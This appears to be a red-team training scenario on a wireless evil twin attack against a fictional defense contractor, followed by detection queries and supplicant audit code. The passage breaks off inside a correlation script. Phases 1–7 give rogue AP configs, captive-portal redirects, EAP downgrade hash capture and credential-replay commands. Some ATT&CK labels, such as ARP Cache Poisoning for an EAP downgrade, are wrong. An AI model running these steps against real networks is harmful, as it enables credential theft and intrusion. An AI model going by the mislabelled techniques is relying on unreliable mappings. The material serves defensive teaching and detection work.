SC-094: Wireless Evil Twin — Operation SIGNAL THIEF

Scenario Overview

ID: SC-094
Category: Network Security / Wireless / Physical Security
Severity: High
ATT&CK Tactics: Initial Access, Credential Access, Collection, Man-in-the-Middle
ATT&CK Techniques: T1557 (Adversary-in-the-Middle), T1040 (Network Sniffing), T1557.002 (ARP Cache Poisoning)
Target Environment: Corporate campus with 6 buildings, 240 enterprise wireless APs, WPA2-Enterprise with 802.1X/EAP-TLS and RADIUS, supporting 1,800 employees at a defense contractor
Difficulty: ★★★★☆
Duration: 2–3 hours
Estimated Impact: 42 devices connected to rogue APs; 28 credential pairs captured via captive portal; 8 RADIUS challenge-response pairs intercepted; 12 session cookies harvested; 4-hour dwell time before WIDS detection; full remediation requiring credential rotation for all affected users

Narrative

Sentinel Dynamics, a fictional mid-tier defense contractor at sentinel-dynamics.example.com, operates a corporate campus across 6 buildings in the Research Triangle area. The organization employs 1,800 staff working on classified and unclassified programs, with 240 Cisco wireless access points managed by a centralized Wireless LAN Controller (WLC). The primary wireless network (SSID: SentinelCorpSecure) uses WPA2-Enterprise with 802.1X/EAP-TLS authentication against a RADIUS server backed by Active Directory certificate services.

However, the campus also broadcasts a guest network (SSID: SentinelGuest) using a captive portal with simple username/password authentication, and a legacy IoT network (SSID: SentinelIoT) using WPA2-PSK for building management systems. The IT team has deployed a Wireless Intrusion Detection System (WIDS) through their WLC, but the sensor coverage has gaps in parking areas and the lobby of Building 3, which was recently renovated.

In April 2026, a red team operator from threat group RADIO FALCON v2 — a physical/wireless penetration testing team simulating an advanced threat actor — deploys a multi-vector wireless attack from the Building 3 parking garage. The attack targets all three SSIDs with tailored approaches: an evil twin captive portal for the guest network, a rogue AP with downgraded EAP for the corporate network, and a PSK capture for the IoT network.

Attack Flow

graph TD
    A[Phase 1: Wireless Reconnaissance<br/>Survey SSIDs, BSSIDs, channels, clients] --> B[Phase 2: Evil Twin Deployment<br/>Clone corporate and guest SSIDs]
    B --> C[Phase 3: Captive Portal Credential Theft<br/>Harvest guest network credentials]
    C --> D[Phase 4: 802.1X Downgrade Attack<br/>Force EAP-TTLS/MSCHAPv2 fallback]
    D --> E[Phase 5: RADIUS Credential Capture<br/>Intercept challenge-response pairs]
    E --> F[Phase 6: Session Hijacking<br/>MitM traffic on rogue AP for cookie theft]
    F --> G[Phase 7: Lateral Movement<br/>Use captured credentials on corporate network]
    G --> H[Phase 8: Detection & Response<br/>WIDS alert + RF containment]

Phase Details

Phase 1: Wireless Reconnaissance

ATT&CK Technique: T1040 (Network Sniffing)

RADIO FALCON v2 conducts passive wireless reconnaissance from the Building 3 parking garage, using a directional antenna to survey all broadcasting SSIDs, identify access point BSSIDs and channels, enumerate connected clients, and map the wireless security posture. This phase is entirely passive and generates no detectable wireless traffic.

# Simulated wireless reconnaissance (educational only)
# Attacker conducts passive survey from parking garage

# Put wireless adapter into monitor mode (simulated)
$ sudo airmon-ng start wlan0

# Passive scan of all channels (simulated output)
$ sudo airodump-ng wlan0mon --band abg --output-format csv -w recon

# Discovered wireless networks (synthetic):
BSSID              PWR  CH  ENC    ESSID
AA:BB:CC:11:22:33  -42   6  WPA2-Enterprise  SentinelCorpSecure
AA:BB:CC:11:22:34  -38  36  WPA2-Enterprise  SentinelCorpSecure
AA:BB:CC:11:22:35  -55  11  WPA2-Enterprise  SentinelCorpSecure
AA:BB:CC:44:55:66  -40   1  Open+Portal      SentinelGuest
AA:BB:CC:44:55:67  -45  44  Open+Portal      SentinelGuest
AA:BB:CC:77:88:99  -60   6  WPA2-PSK         SentinelIoT
AA:BB:CC:77:88:9A  -65  11  WPA2-PSK         SentinelIoT

# Connected clients to SentinelCorpSecure (partial):
STATION            BSSID              PWR  Probes
DD:EE:FF:11:11:11  AA:BB:CC:11:22:33  -48  SentinelCorpSecure
DD:EE:FF:22:22:22  AA:BB:CC:11:22:34  -52  SentinelCorpSecure
DD:EE:FF:33:33:33  AA:BB:CC:11:22:35  -61  SentinelCorpSecure,SentinelGuest

# Key observations:
# - SentinelCorpSecure: WPA2-Enterprise (802.1X) — 3 APs visible
# - SentinelGuest: Open with captive portal — 2 APs visible
# - SentinelIoT: WPA2-PSK — 2 APs visible (building management)
# - Client DD:EE:FF:33:33:33 probes for BOTH corporate and guest SSIDs
#   → This client will auto-connect to whichever SSID responds first
# - Building 3 parking garage has -40 dBm signal to nearest guest AP
#   → Strong enough to deploy a convincing evil twin

# Channel utilization analysis:
# Channel 1: SentinelGuest AP (low utilization)
# Channel 6: SentinelCorpSecure + SentinelIoT (medium utilization)
# Channel 36: SentinelCorpSecure (5GHz — lower range, fewer clients)

Phase 2: Evil Twin AP Deployment

ATT&CK Technique: T1557 (Adversary-in-the-Middle)

RADIO FALCON v2 deploys two rogue access points from the parking garage: one cloning the SentinelGuest SSID with an identical captive portal, and another cloning SentinelCorpSecure with a modified EAP configuration. The rogue APs broadcast at higher power than the legitimate APs, causing nearby clients to preferentially associate with the attacker's infrastructure.

# Simulated evil twin deployment (educational only)
# Attacker deploys rogue APs mimicking corporate SSIDs

# Equipment used (educational reference):
# - 2x USB wireless adapters with external antenna connectors
# - 1x directional panel antenna (for targeted coverage)
# - 1x omnidirectional antenna (for broad coverage)
# - Laptop running hostapd, dnsmasq, and custom captive portal
# - 4G LTE uplink for internet connectivity (upstream)

# Rogue AP 1: Clone SentinelGuest (captive portal attack)
# hostapd configuration (simulated):
interface=wlan1
driver=nl80211
ssid=SentinelGuest
hw_mode=g
channel=1
wmm_enabled=0
auth_algs=1
wpa=0
# Broadcasting as open network with captive portal (matches legitimate)
# TX power: 30 dBm (legitimate APs: 20 dBm)
# → Clients near Building 3 will see stronger signal from rogue AP

# Rogue AP 2: Clone SentinelCorpSecure (EAP downgrade)
# hostapd-wpe configuration (simulated):
interface=wlan2
driver=nl80211
ssid=SentinelCorpSecure
hw_mode=a
channel=36
ieee8021x=1
eapol_version=2
eap_server=1
eap_user_file=/etc/hostapd-wpe/users
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
# The rogue AP presents a self-signed certificate
# Clients with strict certificate validation will reject
# Clients with "trust on first use" or suppressed cert warnings will connect

# Start dnsmasq for DHCP and DNS on rogue AP 1
$ dnsmasq --interface=wlan1 \
    --dhcp-range=192.168.100.10,192.168.100.100,12h \
    --address=/#/192.168.100.1 \
    --no-resolv --log-queries

# Redirect all HTTP/HTTPS traffic to captive portal
$ iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 80 \
    -j REDIRECT --to-port 8080
$ iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 443 \
    -j REDIRECT --to-port 8443

# Results after 30 minutes:
# SentinelGuest evil twin: 28 clients associated
# SentinelCorpSecure evil twin: 14 clients attempted connection
#   - 6 clients rejected certificate (strict validation — EAP-TLS)
#   - 8 clients accepted certificate (misconfigured supplicants)

Phase 3: Captive Portal Credential Theft

ATT&CK Technique: T1557 (Adversary-in-the-Middle)

The rogue SentinelGuest AP presents a pixel-perfect clone of the legitimate Sentinel Dynamics captive portal. When users connect to the evil twin, they are redirected to the fake portal which prompts for their corporate credentials. Many users authenticate with their Active Directory username and password, expecting the normal guest network experience.

# Simulated captive portal credential theft (educational only)
# Attacker serves fake captive portal matching corporate branding

# Captive portal served at 192.168.100.1:8080 (simulated)
# The portal is a clone of the legitimate SentinelGuest login page:
#
# ┌──────────────────────────────────────────┐
# │        SENTINEL DYNAMICS                 │
# │        Guest Wireless Access             │
# │                                          │
# │  Username: [________________________]    │
# │  Password: [________________________]    │
# │                                          │
# │  ☐ I agree to the Acceptable Use Policy  │
# │                                          │
# │         [  Connect  ]                    │
# │                                          │
# │  Trouble connecting? Contact IT Help     │
# │  Desk at ext. 4357                       │
# └──────────────────────────────────────────┘

# Captured credentials are logged (simulated):
[2026-04-01 10:22:15] CREDENTIAL CAPTURED
  Source MAC: DD:EE:FF:44:44:44
  IP: 192.168.100.12
  Username: m.rodriguez@sentinel-dynamics.example.com
  Password: REDACTED
  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_0)
  Action: Redirected to real internet (via 4G uplink)

[2026-04-01 10:25:33] CREDENTIAL CAPTURED
  Source MAC: DD:EE:FF:55:55:55
  IP: 192.168.100.15
  Username: j.chen@sentinel-dynamics.example.com
  Password: REDACTED
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  Action: Redirected to real internet (via 4G uplink)

# After providing credentials, users are connected to the internet
# via the attacker's 4G uplink — they experience normal connectivity
# and don't suspect compromise

# Results over 2 hours:
# Total clients connected to rogue SentinelGuest: 42
# Clients who entered credentials: 28
# Unique credential pairs captured: 28
# Credentials using AD format (DOMAIN\user or user@domain): 24
# Credentials with potential reuse on corporate network: 24
# Users who noticed anything suspicious: 0

Phase 4: 802.1X EAP Downgrade Attack

ATT&CK Technique: T1557.002 (ARP Cache Poisoning)

For the corporate network attack, RADIO FALCON v2 exploits clients whose 802.1X supplicants are configured to accept EAP-TTLS or PEAP in addition to EAP-TLS. The rogue AP advertises support only for EAP-TTLS/MSCHAPv2, forcing clients that support multiple EAP methods to fall back from certificate-based authentication to password-based authentication. The inner MSCHAPv2 challenge-response is captured for offline cracking.

# Simulated 802.1X downgrade attack (educational only)
# Rogue AP forces EAP method downgrade from EAP-TLS to EAP-TTLS/MSCHAPv2

# The legitimate SentinelCorpSecure network supports:
# - EAP-TLS (primary — certificate-based, strongest)
# - EAP-TTLS/MSCHAPv2 (fallback — password-based, vulnerable)
# - PEAP/MSCHAPv2 (legacy — password-based, vulnerable)
#
# Some client supplicants are configured to accept ANY EAP method
# offered by the AP, rather than pinning to EAP-TLS only

# hostapd-wpe captures the MSCHAPv2 challenge-response (simulated):
[2026-04-01 10:35:22] EAP-TTLS/MSCHAPv2 CHALLENGE-RESPONSE CAPTURED
  Client MAC: DD:EE:FF:66:66:66
  Identity: SENTINEL\a.patel
  Challenge: 8d7f3a2b1c4e5f60
  Response: a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6
  # This challenge-response can be cracked offline

[2026-04-01 10:38:45] EAP-TTLS/MSCHAPv2 CHALLENGE-RESPONSE CAPTURED
  Client MAC: DD:EE:FF:77:77:77
  Identity: SENTINEL\k.washington
  Challenge: 2e4f6a8b0c1d3e5f
  Response: f6e5d4c3b2a1f0e9d8c7b6a5f4e3d2c1
  # This challenge-response can be cracked offline

[2026-04-01 10:41:18] EAP-TLS REJECTED — CLIENT VALIDATED CERTIFICATE
  Client MAC: DD:EE:FF:88:88:88
  Identity: SENTINEL\r.nakamura
  Reason: Certificate validation failed — client pinned to corporate CA
  Result: Client disconnected and refused to associate
  # Properly configured supplicant — attack failed for this client

# MSCHAPv2 offline cracking (simulated):
# The captured challenge-response pairs are converted to hashcat format
$ cat mschapv2_hashes.txt
SENTINEL\a.patel:::8d7f3a2b1c4e5f60:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6:REDACTED
SENTINEL\k.washington:::2e4f6a8b0c1d3e5f:f6e5d4c3b2a1f0e9d8c7b6a5f4e3d2c1:REDACTED

# Results:
# Total clients attempting 802.1X on rogue AP: 14
# Clients that rejected cert (EAP-TLS pinned): 6 — ATTACK FAILED
# Clients that downgraded to EAP-TTLS/MSCHAPv2: 8 — CAPTURED
# Challenge-response pairs for offline cracking: 8
# Successfully cracked (simulated): 5 of 8
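The supplicant posture that separated the 6 clients that refused the rogue AP from the 8 that downgraded can be checked mechanically before an exercise. The Python audit below is an added example, not part of the scenario or of any vendor tool: it parses wpa_supplicant-style network blocks (two constructed profiles are embedded, one permissive and one hardened; the CA path, certificate paths and RADIUS hostname are assumed values) and flags the settings that leave a client open to the downgrade described above.

```python
"""Audit wpa_supplicant-style 802.1X profiles for EAP-downgrade exposure.

Added example (not from the scenario). Flags the three settings that decided
Phase 4: password-based EAP methods offered alongside EAP-TLS, no CA used to
validate the RADIUS server certificate, and no pinning of the server identity.
"""
import re

# Constructed sample profiles. Certificate paths and the RADIUS hostname are
# assumed values for the example.
WEAK_PROFILE = """
network={
    ssid="SentinelCorpSecure"
    key_mgmt=WPA-EAP
    eap=TLS TTLS PEAP
    identity="a.patel@sentinel-dynamics.example.com"
    phase2="auth=MSCHAPV2"
}
"""

HARDENED_PROFILE = """
network={
    ssid="SentinelCorpSecure"
    key_mgmt=WPA-EAP
    eap=TLS
    identity="r.nakamura@sentinel-dynamics.example.com"
    ca_cert="/etc/ssl/certs/sentinel-corp-ca.pem"
    client_cert="/etc/ssl/certs/r.nakamura.pem"
    private_key="/etc/ssl/private/r.nakamura.key"
    domain_match="radius.sentinel-dynamics.example.com"
}
"""

# Outer EAP methods that end in a password exchange a rogue AP can capture.
PASSWORD_METHODS = {"TTLS", "PEAP", "LEAP", "MD5", "FAST"}
# Any one of these pins the server identity once ca_cert is set.
IDENTITY_PINS = ("domain_match", "domain_suffix_match", "subject_match")


def parse_networks(conf):
    """Return one {setting: value} dict per network={...} block."""
    networks = []
    for block in re.findall(r"network=\{(.*?)\}", conf, re.S):
        settings = {}
        for line in block.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            settings[key.strip()] = value.strip().strip('"')
        networks.append(settings)
    return networks


def audit_network(net):
    """Return a list of findings; an empty list means the profile is hardened."""
    findings = []
    methods = set(net.get("eap", "").upper().split())
    weak = sorted(methods & PASSWORD_METHODS)
    if weak:
        findings.append(f"offers password-based EAP methods {weak}; "
                        "a rogue AP can steer the client onto one of them")
    if "TLS" not in methods:
        findings.append("EAP-TLS is not offered at all")
    if not net.get("ca_cert"):
        findings.append("no ca_cert: the RADIUS server certificate is never validated")
    if not any(net.get(k) for k in IDENTITY_PINS):
        findings.append("no domain_match/subject_match: any certificate the CA "
                        "issued is accepted, including one for another host")
    return findings


def audit_config(conf):
    """Map each SSID in a config to its findings."""
    return {net.get("ssid", "<no ssid>"): audit_network(net)
            for net in parse_networks(conf)}


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_PROFILE), ("hardened", HARDENED_PROFILE)):
        for ssid, findings in audit_config(conf).items():
            print(f"[{label}] {ssid}: {'OK' if not findings else ''}")
            for finding in findings:
                print(f"  - {finding}")
```

The same three checks map onto a Windows supplicant GPO (EAP type restricted to EAP-TLS, "Validate server certificate" with the corporate CA selected, and the RADIUS server name filled in).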

Phase 5: RADIUS Credential Capture and Replay

ATT&CK Technique: T1040 (Network Sniffing)

With captured and cracked credentials from both the captive portal and EAP downgrade attacks, RADIO FALCON v2 now possesses valid Active Directory credentials for 29 unique users. The attacker validates these credentials against the legitimate corporate wireless network and internal services accessible from the guest network segment.

# Simulated credential validation (educational only)
# Attacker validates captured credentials against corporate services

# Credential inventory after 2 hours of operation:
# Source 1 — Captive portal (SentinelGuest evil twin):
#   24 AD credentials captured in cleartext

# Source 2 — EAP downgrade (SentinelCorpSecure evil twin):
#   5 AD credentials cracked from MSCHAPv2 challenge-response

# Total unique valid AD credentials: 29 (some overlap)
# Accounts with admin group membership: 3 (discovered later)

# Validate credentials against legitimate network (simulated)
# Attacker connects to real SentinelGuest with a captured credential
# and tests access to internal services visible from guest VLAN

# Guest VLAN network scan reveals exposed services:
$ nmap -sT -Pn --top-ports 20 10.50.0.0/24

# Exposed services from guest VLAN (misconfiguration):
# 10.50.0.10:443  — Internal web portal (should not be guest-accessible)
# 10.50.0.20:389  — LDAP (should not be guest-accessible)
# 10.50.0.30:8443 — VPN gateway login page

# Test captured credential against VPN gateway
$ curl -sk "https://10.50.0.30:8443/login" \
    -d "username=m.rodriguez@sentinel-dynamics.example.com" \
    -d "password=REDACTED"

# Response: HTTP 302 → /portal/home
# VPN authentication successful with captured guest portal credential!
# The user reused their AD password on the guest portal
# and the VPN gateway is accessible from the guest VLAN

Phase 6: Session Hijacking on Rogue AP

ATT&CK Technique: T1557 (Adversary-in-the-Middle)

While users are connected to the rogue APs, all their network traffic flows through the attacker's infrastructure. RADIO FALCON v2 performs SSL stripping and session cookie interception on HTTP traffic, and logs DNS queries to map the victim's browsing patterns and internal service access.

# Simulated session hijacking (educational only)
# Attacker intercepts traffic flowing through rogue AP

# DNS query logging reveals internal service URLs
[10:30:15] 192.168.100.12 → intranet.sentinel-dynamics.example.com
[10:30:22] 192.168.100.15 → jira.sentinel-dynamics.example.com
[10:31:05] 192.168.100.12 → confluence.sentinel-dynamics.example.com
[10:31:18] 192.168.100.20 → gitlab.sentinel-dynamics.example.com
[10:32:44] 192.168.100.15 → mail.sentinel-dynamics.example.com

# HTTP session cookie interception (for non-HSTS sites)
# Note: modern HSTS and certificate pinning prevent most cookie theft
# but some internal applications lack HSTS headers

[2026-04-01 10:33:12] SESSION COOKIE INTERCEPTED
  Client: 192.168.100.12
  Host: intranet.sentinel-dynamics.example.com
  Cookie: JSESSIONID=ABC123DEF456EXAMPLE
  Protocol: HTTP (not HTTPS — internal site without TLS)
  Risk: Session can be replayed for intranet access

[2026-04-01 10:35:44] SESSION COOKIE INTERCEPTED
  Client: 192.168.100.20
  Host: confluence.sentinel-dynamics.example.com
  Cookie: seraph.confluence=REDACTED
  Protocol: HTTP (Confluence without enforced HTTPS)
  Risk: Full Confluence access with user's session

# Results:
# Session cookies captured: 12 (from non-HTTPS internal services)
# DNS queries logged: 847 (mapping internal infrastructure)
# HTTPS traffic: encrypted — NOT interceptable (HSTS enforced)
# Internal services without HTTPS: 4 identified

Phase 7: Lateral Movement via Captured Credentials

ATT&CK Technique: T1557 (Adversary-in-the-Middle)

Using validated credentials and session cookies, RADIO FALCON v2 authenticates to the corporate VPN from a separate device, gaining full corporate network access. The attacker then uses the captured credentials to access internal systems, escalate privileges, and demonstrate the impact of the wireless attack vector.

# Simulated lateral movement (educational only)
# Attacker uses captured credentials to access corporate network

# Connect to corporate VPN using captured credentials
# VPN client connection (simulated):
$ openconnect https://10.50.0.30:8443 \
    --user=m.rodriguez@sentinel-dynamics.example.com \
    --passwd-on-stdin <<< "REDACTED"

# Connected to corporate network:
# Tunnel IP: 10.100.50.25
# DNS: 10.1.0.10, 10.1.0.11
# Routes: 10.0.0.0/8 via tunnel

# Enumerate internal services with captured credentials
$ ldapsearch -H ldap://10.1.0.10 \
    -D "m.rodriguez@sentinel-dynamics.example.com" \
    -w "REDACTED" \
    -b "DC=sentinel-dynamics,DC=example,DC=com" \
    "(memberOf=CN=IT-Admins,OU=Groups,DC=sentinel-dynamics,DC=example,DC=com)" \
    sAMAccountName

# IT Admin group members discovered:
# a.patel (credentials also captured via EAP downgrade!)
# t.williams
# s.kumar
# r.nakamura (EAP downgrade failed — cert pinned)

# a.patel has IT Admin privileges AND their credentials were captured
# This enables privileged access to internal systems

# Access internal systems with IT Admin credentials (simulated):
$ curl -sk "https://sccm.sentinel-dynamics.example.com/admin" \
    -u "SENTINEL\a.patel:REDACTED"

# Response: HTTP 200 — SCCM Admin Console accessible
# The attacker now has access to the endpoint management system
# from a wireless attack that started in a parking garage

# Impact summary (synthetic):
# Credentials captured: 29 unique AD accounts
# Privileged accounts compromised: 3 (including 1 IT Admin)
# VPN access established: yes (from guest VLAN)
# Internal systems accessed: VPN, intranet, Confluence, SCCM
# Data accessible: internal documentation, endpoint management
# Attack duration: 2.5 hours of rogue AP operation

Phase 8: Detection & Response

The attack is detected through multiple monitoring channels:

Channel 1 (T+2 hours): WIDS Rogue AP Alert — The Cisco WLC Wireless Intrusion Detection System detects a rogue AP broadcasting SentinelCorpSecure on channel 36 with a BSSID not in the managed AP inventory. The detection was delayed because the rogue AP was in a parking garage with limited WIDS sensor coverage.

Channel 2 (T+3 hours): RADIUS Authentication Anomaly — The RADIUS server logs show 8 EAP-TTLS/MSCHAPv2 authentication attempts from the rogue AP's BSSID, which is not a managed AP. Legitimate APs only use EAP-TLS for the corporate SSID.

Channel 3 (T+4 hours): VPN Geolocation Anomaly — The VPN gateway flags a login from m.rodriguez from an IP address (198.51.100.44) not associated with any known office location, while m.rodriguez's laptop is still connected to the corporate network at the main campus.

# Simulated detection timeline (educational only)
[2026-04-01 12:30:00 UTC] WIDS — ROGUE AP DETECTED
  Alert: ROGUE_AP_SSID_CLONE
  Details:
    - Rogue BSSID: FF:AA:BB:CC:DD:EE (not in managed AP inventory)
    - SSID: SentinelCorpSecure
    - Channel: 36 (5 GHz)
    - Signal strength: -35 dBm (unusually strong — high TX power)
    - Location estimate: Building 3 parking area (limited sensor coverage)
    - Clients associated: 8
  Severity: HIGH
  Action: RF containment initiated from nearest managed APs

[2026-04-01 13:15:00 UTC] RADIUS — EAP METHOD ANOMALY
  Alert: UNEXPECTED_EAP_METHOD
  Details:
    - Authentication attempts: 8 via EAP-TTLS/MSCHAPv2
    - Expected method: EAP-TLS only (corporate policy)
    - Source BSSID: FF:AA:BB:CC:DD:EE (matches rogue AP alert)
    - Identities: SENTINEL\a.patel, SENTINEL\k.washington, +6 others
    - All attempts from unmanaged AP — ILLEGITIMATE
  Severity: CRITICAL
  Action: Credentials for affected users flagged for reset

[2026-04-01 14:00:00 UTC] VPN — IMPOSSIBLE TRAVEL ALERT
  Alert: CONCURRENT_SESSION_ANOMALY
  Details:
    - User: m.rodriguez@sentinel-dynamics.example.com
    - Session 1: Corporate network (10.1.5.100) — active since 08:00
    - Session 2: VPN from 198.51.100.44 — started at 13:45
    - Distance: >500 miles between locations
    - Time gap: concurrent sessions
  Severity: CRITICAL
  Action: VPN session terminated, account locked

Detection Queries:

// KQL — Detect rogue AP via WIDS/WLC events
WirelessControllerLogs
| where TimeGenerated > ago(24h)
| where EventType in ("RogueAPDetected", "RogueAPSpoofedSSID")
| extend RogueBSSID = tostring(parse_json(EventData).bssid)
| extend SpoofedSSID = tostring(parse_json(EventData).ssid)
| extend SignalStrength = toint(parse_json(EventData).rssi)
| extend Channel = toint(parse_json(EventData).channel)
| extend ClientCount = toint(parse_json(EventData).associatedClients)
| where SpoofedSSID in ("SentinelCorpSecure", "SentinelGuest")
| project TimeGenerated, RogueBSSID, SpoofedSSID, SignalStrength,
          Channel, ClientCount

// KQL — Detect EAP method downgrade attacks via RADIUS logs
SecurityEvent
| where TimeGenerated > ago(24h)
| where EventID == 6273 or EventID == 6274  // NPS authentication events
| extend EAPMethod = tostring(EventData)
| where EAPMethod has "EAP-TTLS" or EAPMethod has "MSCHAPv2"
| extend CallingStationId = extract(@"Calling-Station-Id:\s*(\S+)", 1, EventData)
| extend CalledStationId = extract(@"Called-Station-Id:\s*(\S+)", 1, EventData)
| extend UserName = TargetUserName
| summarize AttemptCount = count(),
            Users = make_set(UserName),
            SourceMACs = make_set(CallingStationId)
  by CalledStationId, bin(TimeGenerated, 1h)
| where AttemptCount > 3
| project TimeGenerated, CalledStationId, AttemptCount, Users, SourceMACs

// KQL — Detect concurrent VPN and corporate network sessions
SigninLogs
| where TimeGenerated > ago(24h)
| where AppDisplayName has "VPN"
| extend VPNUser = UserPrincipalName, VPNIP = IPAddress
| join kind=inner (
    SigninLogs
    | where TimeGenerated > ago(24h)
    | where AppDisplayName !has "VPN"
    | where NetworkLocationDetails has "corporate"
    | extend CorpUser = UserPrincipalName, CorpIP = IPAddress
) on $left.VPNUser == $right.CorpUser
| where abs(datetime_diff('minute', TimeGenerated, TimeGenerated1)) < 30
| where VPNIP != CorpIP
| project TimeGenerated, VPNUser, VPNIP, CorpIP,
          TimeDelta_Minutes = datetime_diff('minute', TimeGenerated, TimeGenerated1)

// KQL — Detect captive portal credential harvesting via DNS anomaly
DnsEvents
| where TimeGenerated > ago(24h)
| where Name has "sentinel-dynamics.example.com"
| extend ResolvedIP = tostring(IPAddresses)
| where ResolvedIP startswith "192.168." or ResolvedIP startswith "10.100."
| summarize QueryCount = count(),
            UniqueClients = dcount(ClientIP),
            ResolvedIPs = make_set(ResolvedIP)
  by Name, bin(TimeGenerated, 30m)
| where QueryCount > 20 and UniqueClients > 5
| project TimeGenerated, Name, QueryCount, UniqueClients, ResolvedIPs

# SPL — Detect rogue AP via WIDS/WLC events
index=wireless sourcetype=cisco:wlc
  (event_type="RogueAPDetected" OR event_type="RogueAPSpoofedSSID")
| spath output=rogue_bssid path=bssid
| spath output=spoofed_ssid path=ssid
| spath output=signal_strength path=rssi
| spath output=channel path=channel
| spath output=client_count path=associatedClients
| where spoofed_ssid IN ("SentinelCorpSecure", "SentinelGuest")
| table _time, rogue_bssid, spoofed_ssid, signal_strength,
        channel, client_count

# SPL — Detect EAP method downgrade attacks via RADIUS logs
index=radius sourcetype=microsoft:nps
  (EventCode=6273 OR EventCode=6274)
| where match(EAPType, "(EAP-TTLS|MSCHAPv2)")
| rename Calling_Station_Id as source_mac,
         Called_Station_Id as ap_bssid,
         User_Name as username
| bin _time span=1h
| stats count as attempt_count,
        values(username) as users,
        values(source_mac) as source_macs
  by ap_bssid, _time
| where attempt_count > 3
| table _time, ap_bssid, attempt_count, users, source_macs

# SPL — Detect concurrent VPN and corporate network sessions
index=vpn sourcetype=vpn:auth action=success
| rename user as vpn_user, src_ip as vpn_ip
| join vpn_user [
    search index=windows sourcetype=WinEventLog:Security EventCode=4624
    | where LogonType=3
    | rename TargetUserName as vpn_user, IpAddress as corp_ip, _time as corp_time
    | where match(corp_ip, "^10\.")
]
| where vpn_ip != corp_ip
| eval time_diff = abs(_time - corp_time)
| where time_diff < 1800
| table _time, vpn_user, vpn_ip, corp_ip, time_diff

# SPL — Detect captive portal credential harvesting via DNS anomaly
index=dns sourcetype=dns
  query="*sentinel-dynamics.example.com*"
| where match(answer, "^(192\.168\.|10\.100\.)")
| bin _time span=30m
| stats count as query_count,
        dc(src_ip) as unique_clients,
        values(answer) as resolved_ips
  by query, _time
| where query_count > 20 AND unique_clients > 5
| table _time, query, query_count, unique_clients, resolved_ips
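The two strongest signals in the timeline, a cloned SSID from an unmanaged BSSID and password-based EAP attempts relayed by that same BSSID, can also be correlated outside the SIEM. The Python below is an added example, not part of the scenario or of any vendor product: it applies the same checks as the WLC and RADIUS queries above to exported log lines (both log formats are constructed for the example; the managed-AP inventory and the EAP-TLS-only policy come from the scenario) and raises the severity when the two signals point at the same AP.

```python
"""Correlate WIDS rogue-AP events with RADIUS EAP-method anomalies.

Added example, not part of the scenario or of any vendor product. It applies
the same two checks as the WLC and RADIUS queries above to exported log lines:
(1) a BSSID advertising a protected SSID that is not in the managed-AP
inventory, and (2) password-based EAP attempts on an SSID whose policy is
EAP-TLS only, grouped by the Called-Station-Id (the AP) that relayed them.
Both log formats are constructed for the example.
"""
import json
import re
from collections import defaultdict

# Managed-AP inventory and policy, taken from the scenario's survey.
MANAGED_APS = {"AA:BB:CC:11:22:33", "AA:BB:CC:11:22:34", "AA:BB:CC:11:22:35",
               "AA:BB:CC:44:55:66", "AA:BB:CC:44:55:67",
               "AA:BB:CC:77:88:99", "AA:BB:CC:77:88:9A"}
PROTECTED_SSIDS = {"SentinelCorpSecure", "SentinelGuest", "SentinelIoT"}
ALLOWED_EAP = {"SentinelCorpSecure": {"EAP-TLS"}}  # corporate policy

# Constructed WIDS export, one JSON event per line.
WIDS_LOG = """\
{"ts": "2026-04-01T12:30:00Z", "type": "RogueAPDetected", "bssid": "ff:aa:bb:cc:dd:ee", "ssid": "SentinelCorpSecure", "rssi": -35, "channel": 36}
{"ts": "2026-04-01T12:30:05Z", "type": "APStatus", "bssid": "AA:BB:CC:11:22:34", "ssid": "SentinelCorpSecure", "rssi": -38, "channel": 36}
{"ts": "2026-04-01T12:31:00Z", "type": "RogueAPDetected", "bssid": "FF:AA:BB:CC:DD:EF", "ssid": "CoffeeShopWiFi", "rssi": -70, "channel": 1}
"""

# Constructed RADIUS lines. Called-Station-Id uses the common "MAC:SSID"
# form with hyphenated MACs, which the parser normalises.
RADIUS_LOG = """\
ts=2026-04-01T10:35:22Z user=SENTINEL\\a.patel eap=EAP-TTLS/MSCHAPv2 calling=DD-EE-FF-66-66-66 called=FF-AA-BB-CC-DD-EE:SentinelCorpSecure
ts=2026-04-01T10:38:45Z user=SENTINEL\\k.washington eap=EAP-TTLS/MSCHAPv2 calling=DD-EE-FF-77-77-77 called=FF-AA-BB-CC-DD-EE:SentinelCorpSecure
ts=2026-04-01T10:41:18Z user=SENTINEL\\r.nakamura eap=EAP-TLS calling=DD-EE-FF-88-88-88 called=AA-BB-CC-11-22-34:SentinelCorpSecure
"""

KV = re.compile(r"(\w+)=(\S+)")


def norm_mac(mac):
    """Normalise AA-BB-CC-11-22-33 / aa:bb:... to AA:BB:CC:11:22:33."""
    return mac.replace("-", ":").upper()


def find_rogue_aps(wids_lines):
    """Map BSSID -> event for APs advertising a protected SSID from outside the inventory."""
    rogues = {}
    for line in wids_lines.splitlines():
        ev = json.loads(line)
        bssid = norm_mac(ev["bssid"])
        if ev["ssid"] in PROTECTED_SSIDS and bssid not in MANAGED_APS:
            rogues[bssid] = ev
    return rogues


def find_eap_anomalies(radius_lines):
    """Map AP BSSID -> [(user, eap)] for attempts whose EAP method violates SSID policy."""
    by_ap = defaultdict(list)
    for line in radius_lines.splitlines():
        fields = dict(KV.findall(line))
        mac, _, ssid = fields["called"].rpartition(":")
        outer_method = fields["eap"].split("/")[0]  # EAP-TTLS/MSCHAPv2 -> EAP-TTLS
        if outer_method not in ALLOWED_EAP.get(ssid, {outer_method}):
            by_ap[norm_mac(mac)].append((fields["user"], fields["eap"]))
    return dict(by_ap)


def correlate(wids_lines, radius_lines):
    """Produce one alert per suspicious BSSID; CRITICAL when both signals agree."""
    rogues = find_rogue_aps(wids_lines)
    anomalies = find_eap_anomalies(radius_lines)
    alerts = {}
    for bssid in rogues.keys() | anomalies.keys():
        attempts = anomalies.get(bssid, [])
        alerts[bssid] = {
            "rogue_ap": bssid in rogues,
            "ssid": rogues[bssid]["ssid"] if bssid in rogues else None,
            "eap_violations": len(attempts),
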